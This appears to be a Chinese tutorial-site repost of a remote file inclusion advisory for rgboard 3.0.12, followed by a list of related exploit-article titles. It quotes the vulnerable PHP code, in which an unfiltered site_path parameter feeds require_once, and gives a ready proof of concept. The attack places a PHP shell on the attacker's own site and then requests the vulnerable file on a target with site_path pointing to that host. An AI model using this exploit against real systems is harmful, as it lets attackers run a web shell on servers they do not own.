手机
当前位置:查字典教程网 >实用技巧 >漏洞研究 >rgboard 3.0.12 远程文件包含漏洞
rgboard 3.0.12 远程文件包含漏洞
摘要:vulcode:includebbs.lib.inc.php:if(!defined('BBS_LIB_INC_INCLUDED')){de...

vulcode:

includebbs.lib.inc.php:

if(!defined('BBS_LIB_INC_INCLUDED')){

define('BBS_LIB_INC_INCLUDED',1);

//*–BBS_LIB_INC_INCLUDEDSTART–*

if(!$site_path)$site_path='./';

require_once“{$site_path}include/lib.inc.php”;

//$site_path没有过滤直接放过来包含了

poc:

在你的网站放个phpshell,目录和文件名为/include/lib.inc.php

然后访问

httP://www.target.com/include/bbs.lib.inc.php?site_path=http://yousite/

【rgboard 3.0.12 远程文件包含漏洞】相关文章:

DVBBS7.1 SQL版 跨库漏洞

用QQ文件共享漏洞彻底攻破Windows2003的坚固堡垒

河南移动网络客服系统验证码的缺陷分析和利用!

我是如何发现CCProxy远程溢出漏洞的

Oblog3.0漏洞曝光

WordPress下载监控插件id参数SQL注入漏洞

安全技术—RSA公钥密码体制安全性分析

轻轻绕过你的验证码并进行攻击

漏洞漫舞的飞骋

MSHTA漏洞为黑客大开远程控制之门(图)

精品推荐
分类导航